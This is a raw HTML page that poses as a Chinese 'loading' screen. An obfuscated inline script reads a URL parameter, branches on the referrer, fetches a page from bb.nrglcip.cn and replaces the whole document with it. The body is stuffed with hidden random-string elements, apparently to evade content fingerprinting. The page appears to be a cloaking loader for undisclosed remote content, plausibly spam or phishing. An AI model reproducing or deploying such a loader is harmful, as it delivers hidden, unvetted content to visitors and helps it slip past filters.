<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .qB0WJM1fHh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .qB0WJM1fHh .Zm4n3M {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .qB0WJM1fHh .content {
            line-height: 50px;
            text-align: center
        }

        .qB0WJM1fHh .img {
            width: 100%
        }

        .qB0WJM1fHh .xem1B5 {
            text-align: center
        }

        .qB0WJM1fHh .xem1B5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .qB0WJM1fHh .xem1B5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .qB0WJM1fHh .xem1B5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .qB0WJM1fHh .xem1B5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .qB0WJM1fHh .xem1B5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .qB0WJM1fHh .xem1B5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .qB0WJM1fHh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Hzfy9AcXWpz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var s57hB = Hzfy9AcXWpz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ s57hB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ s57hB +".html?a=share";
		}
		
        Eqr89Xm=url+"#"+new Date().getTime();
        Eqr89Xm && function() {
            $.get(Eqr89Xm, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >vy6Oqr4KdlvI1JRxQeL7JcSGncDrXr1uXGN0xDwEC0MadiquxcIbdNXC2jhu4ebS8aP2fxBDcf7E90zAOYUfUStfh1dS9XJF5s7KA</b>
<h1 style='display:none' >KQKfGhqqaaQQqZU6k0aAJ4UajfkE0er0qNwb4vGvGVXqLN</h1>
<li style='display:none' >CHOIumGLcUwGhPcWfhZDunDBHKw5F47CTKOMsSBh0gN</li>
<li style='display:none' >CHOIumGLcUwGhPcWfhZDunDBHKw5F47CTKOMsSBh0gN</li><div class="qB0WJM1fHh">
    <div class="Zm4n3M">
        <div class="xem1B5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>xLmxyCsELDGOjC57</a>
<b style='display:none' >Sp08y3PRyWpvwrXzHsllhk8sw32n46Ys0WnKtrn2dZeejRkE0nflALk8h37RCcHaTLKFstlWe04</b>
<h1 style='display:none' >dhdm3oSmbTuq6aFYQEGFZuOaBZfS7qmKNwT</h1>
<h1 style='display:none' >dhdm3oSmbTuq6aFYQEGFZuOaBZfS7qmKNwT</h1>
<h1 style='display:none' >dhdm3oSmbTuq6aFYQEGFZuOaBZfS7qmKNwT</h1></body>
</html>